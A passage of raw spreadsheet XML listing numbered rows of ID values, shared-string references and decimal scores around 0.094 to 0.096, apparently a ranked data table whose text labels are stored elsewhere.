      <c r="C22781" s="2" t="s">
        <v>22003</v>
      </c>
      <c r="D22781" s="2">
        <v>1.0</v>
      </c>
      <c r="E22781" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22781" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22782" ht="15.75" customHeight="1">
      <c r="A22782" s="1">
        <v>34000.0</v>
      </c>
      <c r="B22782" s="2">
        <v>9456989.0</v>
      </c>
      <c r="C22782" s="2" t="s">
        <v>22004</v>
      </c>
      <c r="D22782" s="2">
        <v>1.0</v>
      </c>
      <c r="E22782" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22782" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22783" ht="15.75" customHeight="1">
      <c r="A22783" s="1">
        <v>373.0</v>
      </c>
      <c r="B22783" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C22783" s="2" t="s">
        <v>22005</v>
      </c>
      <c r="D22783" s="2">
        <v>1.0</v>
      </c>
      <c r="E22783" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22783" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22784" ht="15.75" customHeight="1">
      <c r="A22784" s="1">
        <v>496.0</v>
      </c>
      <c r="B22784" s="2">
        <v>1.7749748E7</v>
      </c>
      <c r="C22784" s="2" t="s">
        <v>22006</v>
      </c>
      <c r="D22784" s="2">
        <v>1.0</v>
      </c>
      <c r="E22784" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22784" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22785" ht="15.75" customHeight="1">
      <c r="A22785" s="1">
        <v>687.0</v>
      </c>
      <c r="B22785" s="2">
        <v>2.0330793E7</v>
      </c>
      <c r="C22785" s="2" t="s">
        <v>22007</v>
      </c>
      <c r="D22785" s="2">
        <v>1.0</v>
      </c>
      <c r="E22785" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22785" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22786" ht="15.75" customHeight="1">
      <c r="A22786" s="1">
        <v>759.0</v>
      </c>
      <c r="B22786" s="2">
        <v>2.0985166E7</v>
      </c>
      <c r="C22786" s="2" t="s">
        <v>22008</v>
      </c>
      <c r="D22786" s="2">
        <v>1.0</v>
      </c>
      <c r="E22786" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22786" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22787" ht="15.75" customHeight="1">
      <c r="A22787" s="1">
        <v>2814.0</v>
      </c>
      <c r="B22787" s="2">
        <v>3.5374162E7</v>
      </c>
      <c r="C22787" s="2" t="s">
        <v>22009</v>
      </c>
      <c r="D22787" s="2">
        <v>1.0</v>
      </c>
      <c r="E22787" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22787" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22788" ht="15.75" customHeight="1">
      <c r="A22788" s="1">
        <v>2908.0</v>
      </c>
      <c r="B22788" s="2">
        <v>3.5812694E7</v>
      </c>
      <c r="C22788" s="2" t="s">
        <v>22010</v>
      </c>
      <c r="D22788" s="2">
        <v>1.0</v>
      </c>
      <c r="E22788" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22788" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22789" ht="15.75" customHeight="1">
      <c r="A22789" s="1">
        <v>4198.0</v>
      </c>
      <c r="B22789" s="2">
        <v>4.1640236E7</v>
      </c>
      <c r="C22789" s="2" t="s">
        <v>22011</v>
      </c>
      <c r="D22789" s="2">
        <v>1.0</v>
      </c>
      <c r="E22789" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22789" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22790" ht="15.75" customHeight="1">
      <c r="A22790" s="1">
        <v>9476.0</v>
      </c>
      <c r="B22790" s="2">
        <v>5.5869254E7</v>
      </c>
      <c r="C22790" s="2" t="s">
        <v>22012</v>
      </c>
      <c r="D22790" s="2">
        <v>1.0</v>
      </c>
      <c r="E22790" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22790" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22791" ht="15.75" customHeight="1">
      <c r="A22791" s="1">
        <v>9570.0</v>
      </c>
      <c r="B22791" s="2">
        <v>5.605565E7</v>
      </c>
      <c r="C22791" s="2" t="s">
        <v>22013</v>
      </c>
      <c r="D22791" s="2">
        <v>1.0</v>
      </c>
      <c r="E22791" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22791" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22792" ht="15.75" customHeight="1">
      <c r="A22792" s="1">
        <v>9639.0</v>
      </c>
      <c r="B22792" s="2">
        <v>5.6236698E7</v>
      </c>
      <c r="C22792" s="2" t="s">
        <v>22014</v>
      </c>
      <c r="D22792" s="2">
        <v>1.0</v>
      </c>
      <c r="E22792" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22792" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22793" ht="15.75" customHeight="1">
      <c r="A22793" s="1">
        <v>10200.0</v>
      </c>
      <c r="B22793" s="2">
        <v>5.740268E7</v>
      </c>
      <c r="C22793" s="2" t="s">
        <v>22015</v>
      </c>
      <c r="D22793" s="2">
        <v>1.0</v>
      </c>
      <c r="E22793" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22793" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22794" ht="15.75" customHeight="1">
      <c r="A22794" s="1">
        <v>10240.0</v>
      </c>
      <c r="B22794" s="2">
        <v>5.7529545E7</v>
      </c>
      <c r="C22794" s="2" t="s">
        <v>22016</v>
      </c>
      <c r="D22794" s="2">
        <v>1.0</v>
      </c>
      <c r="E22794" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22794" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22795" ht="15.75" customHeight="1">
      <c r="A22795" s="1">
        <v>10561.0</v>
      </c>
      <c r="B22795" s="2">
        <v>1.2711813E7</v>
      </c>
      <c r="C22795" s="2" t="s">
        <v>21936</v>
      </c>
      <c r="D22795" s="2">
        <v>1.0</v>
      </c>
      <c r="E22795" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22795" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22796" ht="15.75" customHeight="1">
      <c r="A22796" s="1">
        <v>10742.0</v>
      </c>
      <c r="B22796" s="2">
        <v>1.5432965E7</v>
      </c>
      <c r="C22796" s="2" t="s">
        <v>22017</v>
      </c>
      <c r="D22796" s="2">
        <v>1.0</v>
      </c>
      <c r="E22796" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22796" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22797" ht="15.75" customHeight="1">
      <c r="A22797" s="1">
        <v>10817.0</v>
      </c>
      <c r="B22797" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C22797" s="2" t="s">
        <v>22018</v>
      </c>
      <c r="D22797" s="2">
        <v>1.0</v>
      </c>
      <c r="E22797" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22797" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22798" ht="15.75" customHeight="1">
      <c r="A22798" s="1">
        <v>13016.0</v>
      </c>
      <c r="B22798" s="2">
        <v>3.290204E7</v>
      </c>
      <c r="C22798" s="2" t="s">
        <v>22019</v>
      </c>
      <c r="D22798" s="2">
        <v>1.0</v>
      </c>
      <c r="E22798" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22798" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22799" ht="15.75" customHeight="1">
      <c r="A22799" s="1">
        <v>14170.0</v>
      </c>
      <c r="B22799" s="2">
        <v>3.8051461E7</v>
      </c>
      <c r="C22799" s="2" t="s">
        <v>22020</v>
      </c>
      <c r="D22799" s="2">
        <v>1.0</v>
      </c>
      <c r="E22799" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22799" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22800" ht="15.75" customHeight="1">
      <c r="A22800" s="1">
        <v>16035.0</v>
      </c>
      <c r="B22800" s="2">
        <v>4.5123502E7</v>
      </c>
      <c r="C22800" s="2" t="s">
        <v>22021</v>
      </c>
      <c r="D22800" s="2">
        <v>1.0</v>
      </c>
      <c r="E22800" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22800" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22801" ht="15.75" customHeight="1">
      <c r="A22801" s="1">
        <v>16895.0</v>
      </c>
      <c r="B22801" s="2">
        <v>4.8068358E7</v>
      </c>
      <c r="C22801" s="2" t="s">
        <v>22022</v>
      </c>
      <c r="D22801" s="2">
        <v>1.0</v>
      </c>
      <c r="E22801" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22801" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22802" ht="15.75" customHeight="1">
      <c r="A22802" s="1">
        <v>18500.0</v>
      </c>
      <c r="B22802" s="2">
        <v>5.294294E7</v>
      </c>
      <c r="C22802" s="2" t="s">
        <v>22023</v>
      </c>
      <c r="D22802" s="2">
        <v>1.0</v>
      </c>
      <c r="E22802" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22802" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22803" ht="15.75" customHeight="1">
      <c r="A22803" s="1">
        <v>18748.0</v>
      </c>
      <c r="B22803" s="2">
        <v>5.377498E7</v>
      </c>
      <c r="C22803" s="2" t="s">
        <v>22024</v>
      </c>
      <c r="D22803" s="2">
        <v>1.0</v>
      </c>
      <c r="E22803" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22803" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22804" ht="15.75" customHeight="1">
      <c r="A22804" s="1">
        <v>25013.0</v>
      </c>
      <c r="B22804" s="2">
        <v>1.2780157E7</v>
      </c>
      <c r="C22804" s="2" t="s">
        <v>22001</v>
      </c>
      <c r="D22804" s="2">
        <v>1.0</v>
      </c>
      <c r="E22804" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22804" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22805" ht="15.75" customHeight="1">
      <c r="A22805" s="1">
        <v>26663.0</v>
      </c>
      <c r="B22805" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C22805" s="2" t="s">
        <v>22025</v>
      </c>
      <c r="D22805" s="2">
        <v>1.0</v>
      </c>
      <c r="E22805" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22805" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22806" ht="15.75" customHeight="1">
      <c r="A22806" s="1">
        <v>30411.0</v>
      </c>
      <c r="B22806" s="2">
        <v>3.8765753E7</v>
      </c>
      <c r="C22806" s="2" t="s">
        <v>22026</v>
      </c>
      <c r="D22806" s="2">
        <v>1.0</v>
      </c>
      <c r="E22806" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22806" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22807" ht="15.75" customHeight="1">
      <c r="A22807" s="1">
        <v>33750.0</v>
      </c>
      <c r="B22807" s="2">
        <v>8588893.0</v>
      </c>
      <c r="C22807" s="2" t="s">
        <v>22027</v>
      </c>
      <c r="D22807" s="2">
        <v>1.0</v>
      </c>
      <c r="E22807" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22807" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="22808" ht="15.75" customHeight="1">
      <c r="A22808" s="1">
        <v>13119.0</v>
      </c>
      <c r="B22808" s="2">
        <v>3.3610284E7</v>
      </c>
      <c r="C22808" s="2" t="s">
        <v>22028</v>
      </c>
      <c r="D22808" s="2">
        <v>1.0</v>
      </c>
      <c r="E22808" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22808" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="22809" ht="15.75" customHeight="1">
      <c r="A22809" s="1">
        <v>15268.0</v>
      </c>
      <c r="B22809" s="2">
        <v>4.2346582E7</v>
      </c>
      <c r="C22809" s="2" t="s">
        <v>22029</v>
      </c>
      <c r="D22809" s="2">
        <v>1.0</v>
      </c>
      <c r="E22809" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22809" s="2">
        <v>0.09508547008547007</v>
      </c>
    </row>
    <row r="22810" ht="15.75" customHeight="1">
      <c r="A22810" s="1">
        <v>3515.0</v>
      </c>
      <c r="B22810" s="2">
        <v>3.8594159E7</v>
      </c>
      <c r="C22810" s="2" t="s">
        <v>22030</v>
      </c>
      <c r="D22810" s="2">
        <v>1.0</v>
      </c>
      <c r="E22810" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22810" s="2">
        <v>0.09508547008547005</v>
      </c>
    </row>
    <row r="22811" ht="15.75" customHeight="1">
      <c r="A22811" s="1">
        <v>5326.0</v>
      </c>
      <c r="B22811" s="2">
        <v>4.5297871E7</v>
      </c>
      <c r="C22811" s="2" t="s">
        <v>22031</v>
      </c>
      <c r="D22811" s="2">
        <v>1.0</v>
      </c>
      <c r="E22811" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22811" s="2">
        <v>0.09508547008547005</v>
      </c>
    </row>
    <row r="22812" ht="15.75" customHeight="1">
      <c r="A22812" s="1">
        <v>176.0</v>
      </c>
      <c r="B22812" s="2">
        <v>1.4046547E7</v>
      </c>
      <c r="C22812" s="2" t="s">
        <v>22032</v>
      </c>
      <c r="D22812" s="2">
        <v>1.0</v>
      </c>
      <c r="E22812" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22812" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22813" ht="15.75" customHeight="1">
      <c r="A22813" s="1">
        <v>970.0</v>
      </c>
      <c r="B22813" s="2">
        <v>2.274894E7</v>
      </c>
      <c r="C22813" s="2" t="s">
        <v>22033</v>
      </c>
      <c r="D22813" s="2">
        <v>1.0</v>
      </c>
      <c r="E22813" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22813" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22814" ht="15.75" customHeight="1">
      <c r="A22814" s="1">
        <v>1793.0</v>
      </c>
      <c r="B22814" s="2">
        <v>2.9134786E7</v>
      </c>
      <c r="C22814" s="2" t="s">
        <v>22034</v>
      </c>
      <c r="D22814" s="2">
        <v>1.0</v>
      </c>
      <c r="E22814" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22814" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22815" ht="15.75" customHeight="1">
      <c r="A22815" s="1">
        <v>9789.0</v>
      </c>
      <c r="B22815" s="2">
        <v>5.6526549E7</v>
      </c>
      <c r="C22815" s="2" t="s">
        <v>22035</v>
      </c>
      <c r="D22815" s="2">
        <v>1.0</v>
      </c>
      <c r="E22815" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22815" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22816" ht="15.75" customHeight="1">
      <c r="A22816" s="1">
        <v>18394.0</v>
      </c>
      <c r="B22816" s="2">
        <v>5.2615826E7</v>
      </c>
      <c r="C22816" s="2" t="s">
        <v>22036</v>
      </c>
      <c r="D22816" s="2">
        <v>1.0</v>
      </c>
      <c r="E22816" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22816" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22817" ht="15.75" customHeight="1">
      <c r="A22817" s="1">
        <v>18528.0</v>
      </c>
      <c r="B22817" s="2">
        <v>5.3076323E7</v>
      </c>
      <c r="C22817" s="2" t="s">
        <v>22037</v>
      </c>
      <c r="D22817" s="2">
        <v>1.0</v>
      </c>
      <c r="E22817" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22817" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22818" ht="15.75" customHeight="1">
      <c r="A22818" s="1">
        <v>19615.0</v>
      </c>
      <c r="B22818" s="2">
        <v>5.6203388E7</v>
      </c>
      <c r="C22818" s="2" t="s">
        <v>22038</v>
      </c>
      <c r="D22818" s="2">
        <v>1.0</v>
      </c>
      <c r="E22818" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22818" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22819" ht="15.75" customHeight="1">
      <c r="A22819" s="1">
        <v>23837.0</v>
      </c>
      <c r="B22819" s="2">
        <v>8095720.0</v>
      </c>
      <c r="C22819" s="2" t="s">
        <v>22039</v>
      </c>
      <c r="D22819" s="2">
        <v>1.0</v>
      </c>
      <c r="E22819" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22819" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22820" ht="15.75" customHeight="1">
      <c r="A22820" s="1">
        <v>25337.0</v>
      </c>
      <c r="B22820" s="2">
        <v>1.3494942E7</v>
      </c>
      <c r="C22820" s="2" t="s">
        <v>21797</v>
      </c>
      <c r="D22820" s="2">
        <v>1.0</v>
      </c>
      <c r="E22820" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22820" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="22821" ht="15.75" customHeight="1">
      <c r="A22821" s="1">
        <v>19530.0</v>
      </c>
      <c r="B22821" s="2">
        <v>5.5977992E7</v>
      </c>
      <c r="C22821" s="5" t="s">
        <v>22040</v>
      </c>
      <c r="D22821" s="2">
        <v>1.0</v>
      </c>
      <c r="E22821" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22821" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="22822" ht="15.75" customHeight="1">
      <c r="A22822" s="1">
        <v>12726.0</v>
      </c>
      <c r="B22822" s="2">
        <v>3.092279E7</v>
      </c>
      <c r="C22822" s="2" t="s">
        <v>22041</v>
      </c>
      <c r="D22822" s="2">
        <v>1.0</v>
      </c>
      <c r="E22822" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22822" s="2">
        <v>0.09454191033138401</v>
      </c>
    </row>
    <row r="22823" ht="15.75" customHeight="1">
      <c r="A22823" s="1">
        <v>1556.0</v>
      </c>
      <c r="B22823" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C22823" s="2" t="s">
        <v>22042</v>
      </c>
      <c r="D22823" s="2">
        <v>1.0</v>
      </c>
      <c r="E22823" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22823" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="22824" ht="15.75" customHeight="1">
      <c r="A22824" s="1">
        <v>19986.0</v>
      </c>
      <c r="B22824" s="2">
        <v>5.762296E7</v>
      </c>
      <c r="C22824" s="2" t="s">
        <v>22043</v>
      </c>
      <c r="D22824" s="2">
        <v>1.0</v>
      </c>
      <c r="E22824" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22824" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="22825" ht="15.75" customHeight="1">
      <c r="A22825" s="1">
        <v>6911.0</v>
      </c>
      <c r="B22825" s="2">
        <v>4.9842568E7</v>
      </c>
      <c r="C22825" s="2" t="s">
        <v>22044</v>
      </c>
      <c r="D22825" s="2">
        <v>1.0</v>
      </c>
      <c r="E22825" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22825" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22826" ht="15.75" customHeight="1">
      <c r="A22826" s="1">
        <v>7412.0</v>
      </c>
      <c r="B22826" s="2">
        <v>5.1131983E7</v>
      </c>
      <c r="C22826" s="2" t="s">
        <v>22045</v>
      </c>
      <c r="D22826" s="2">
        <v>1.0</v>
      </c>
      <c r="E22826" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22826" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22827" ht="15.75" customHeight="1">
      <c r="A22827" s="1">
        <v>11364.0</v>
      </c>
      <c r="B22827" s="2">
        <v>2.1362855E7</v>
      </c>
      <c r="C22827" s="2" t="s">
        <v>22046</v>
      </c>
      <c r="D22827" s="2">
        <v>1.0</v>
      </c>
      <c r="E22827" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22827" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22828" ht="15.75" customHeight="1">
      <c r="A22828" s="1">
        <v>16392.0</v>
      </c>
      <c r="B22828" s="2">
        <v>4.6242084E7</v>
      </c>
      <c r="C22828" s="2" t="s">
        <v>22047</v>
      </c>
      <c r="D22828" s="2">
        <v>1.0</v>
      </c>
      <c r="E22828" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22828" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22829" ht="15.75" customHeight="1">
      <c r="A22829" s="1">
        <v>22076.0</v>
      </c>
      <c r="B22829" s="2">
        <v>3.0627427E7</v>
      </c>
      <c r="C22829" s="2" t="s">
        <v>22048</v>
      </c>
      <c r="D22829" s="2">
        <v>1.0</v>
      </c>
      <c r="E22829" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22829" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22830" ht="15.75" customHeight="1">
      <c r="A22830" s="1">
        <v>27535.0</v>
      </c>
      <c r="B22830" s="2">
        <v>2.2205422E7</v>
      </c>
      <c r="C22830" s="2" t="s">
        <v>22049</v>
      </c>
      <c r="D22830" s="2">
        <v>1.0</v>
      </c>
      <c r="E22830" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22830" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22831" ht="15.75" customHeight="1">
      <c r="A22831" s="1">
        <v>27611.0</v>
      </c>
      <c r="B22831" s="2">
        <v>2.2647882E7</v>
      </c>
      <c r="C22831" s="2" t="s">
        <v>22050</v>
      </c>
      <c r="D22831" s="2">
        <v>1.0</v>
      </c>
      <c r="E22831" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22831" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22832" ht="15.75" customHeight="1">
      <c r="A22832" s="1">
        <v>29162.0</v>
      </c>
      <c r="B22832" s="2">
        <v>3.0627426E7</v>
      </c>
      <c r="C22832" s="2" t="s">
        <v>22048</v>
      </c>
      <c r="D22832" s="2">
        <v>1.0</v>
      </c>
      <c r="E22832" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22832" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="22833" ht="15.75" customHeight="1">
      <c r="A22833" s="1">
        <v>80.0</v>
      </c>
      <c r="B22833" s="2">
        <v>1.186392E7</v>
      </c>
      <c r="C22833" s="2" t="s">
        <v>22051</v>
      </c>
      <c r="D22833" s="2">
        <v>1.0</v>
      </c>
      <c r="E22833" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22833" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22834" ht="15.75" customHeight="1">
      <c r="A22834" s="1">
        <v>232.0</v>
      </c>
      <c r="B22834" s="2">
        <v>1.4758457E7</v>
      </c>
      <c r="C22834" s="2" t="s">
        <v>22052</v>
      </c>
      <c r="D22834" s="2">
        <v>1.0</v>
      </c>
      <c r="E22834" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22834" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22835" ht="15.75" customHeight="1">
      <c r="A22835" s="1">
        <v>351.0</v>
      </c>
      <c r="B22835" s="2">
        <v>1.6044962E7</v>
      </c>
      <c r="C22835" s="2" t="s">
        <v>22053</v>
      </c>
      <c r="D22835" s="2">
        <v>1.0</v>
      </c>
      <c r="E22835" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22835" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22836" ht="15.75" customHeight="1">
      <c r="A22836" s="1">
        <v>550.0</v>
      </c>
      <c r="B22836" s="2">
        <v>1.8786836E7</v>
      </c>
      <c r="C22836" s="2" t="s">
        <v>22054</v>
      </c>
      <c r="D22836" s="2">
        <v>1.0</v>
      </c>
      <c r="E22836" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22836" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22837" ht="15.75" customHeight="1">
      <c r="A22837" s="1">
        <v>665.0</v>
      </c>
      <c r="B22837" s="2">
        <v>2.0156128E7</v>
      </c>
      <c r="C22837" s="2" t="s">
        <v>22055</v>
      </c>
      <c r="D22837" s="2">
        <v>1.0</v>
      </c>
      <c r="E22837" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22837" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22838" ht="15.75" customHeight="1">
      <c r="A22838" s="1">
        <v>1643.0</v>
      </c>
      <c r="B22838" s="2">
        <v>2.8032631E7</v>
      </c>
      <c r="C22838" s="2" t="s">
        <v>22056</v>
      </c>
      <c r="D22838" s="2">
        <v>1.0</v>
      </c>
      <c r="E22838" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22838" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22839" ht="15.75" customHeight="1">
      <c r="A22839" s="1">
        <v>2739.0</v>
      </c>
      <c r="B22839" s="2">
        <v>3.5016098E7</v>
      </c>
      <c r="C22839" s="2" t="s">
        <v>22057</v>
      </c>
      <c r="D22839" s="2">
        <v>1.0</v>
      </c>
      <c r="E22839" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22839" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22840" ht="15.75" customHeight="1">
      <c r="A22840" s="1">
        <v>3784.0</v>
      </c>
      <c r="B22840" s="2">
        <v>3.9919894E7</v>
      </c>
      <c r="C22840" s="2" t="s">
        <v>22058</v>
      </c>
      <c r="D22840" s="2">
        <v>1.0</v>
      </c>
      <c r="E22840" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22840" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22841" ht="15.75" customHeight="1">
      <c r="A22841" s="1">
        <v>4303.0</v>
      </c>
      <c r="B22841" s="2">
        <v>4.1955245E7</v>
      </c>
      <c r="C22841" s="2" t="s">
        <v>22059</v>
      </c>
      <c r="D22841" s="2">
        <v>1.0</v>
      </c>
      <c r="E22841" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22841" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22842" ht="15.75" customHeight="1">
      <c r="A22842" s="1">
        <v>4338.0</v>
      </c>
      <c r="B22842" s="2">
        <v>4.2065087E7</v>
      </c>
      <c r="C22842" s="2" t="s">
        <v>22060</v>
      </c>
      <c r="D22842" s="2">
        <v>1.0</v>
      </c>
      <c r="E22842" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22842" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22843" ht="15.75" customHeight="1">
      <c r="A22843" s="1">
        <v>4604.0</v>
      </c>
      <c r="B22843" s="2">
        <v>4.2832269E7</v>
      </c>
      <c r="C22843" s="2" t="s">
        <v>22061</v>
      </c>
      <c r="D22843" s="2">
        <v>1.0</v>
      </c>
      <c r="E22843" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22843" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22844" ht="15.75" customHeight="1">
      <c r="A22844" s="1">
        <v>4687.0</v>
      </c>
      <c r="B22844" s="2">
        <v>4.3218142E7</v>
      </c>
      <c r="C22844" s="2" t="s">
        <v>22062</v>
      </c>
      <c r="D22844" s="2">
        <v>1.0</v>
      </c>
      <c r="E22844" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22844" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22845" ht="15.75" customHeight="1">
      <c r="A22845" s="1">
        <v>4848.0</v>
      </c>
      <c r="B22845" s="2">
        <v>4.3708886E7</v>
      </c>
      <c r="C22845" s="2" t="s">
        <v>22063</v>
      </c>
      <c r="D22845" s="2">
        <v>1.0</v>
      </c>
      <c r="E22845" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22845" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22846" ht="15.75" customHeight="1">
      <c r="A22846" s="1">
        <v>4874.0</v>
      </c>
      <c r="B22846" s="2">
        <v>4.385039E7</v>
      </c>
      <c r="C22846" s="2" t="s">
        <v>22064</v>
      </c>
      <c r="D22846" s="2">
        <v>1.0</v>
      </c>
      <c r="E22846" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22846" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22847" ht="15.75" customHeight="1">
      <c r="A22847" s="1">
        <v>5202.0</v>
      </c>
      <c r="B22847" s="2">
        <v>4.4899272E7</v>
      </c>
      <c r="C22847" s="2" t="s">
        <v>22065</v>
      </c>
      <c r="D22847" s="2">
        <v>1.0</v>
      </c>
      <c r="E22847" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22847" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22848" ht="15.75" customHeight="1">
      <c r="A22848" s="1">
        <v>5296.0</v>
      </c>
      <c r="B22848" s="2">
        <v>4.5219527E7</v>
      </c>
      <c r="C22848" s="2" t="s">
        <v>22066</v>
      </c>
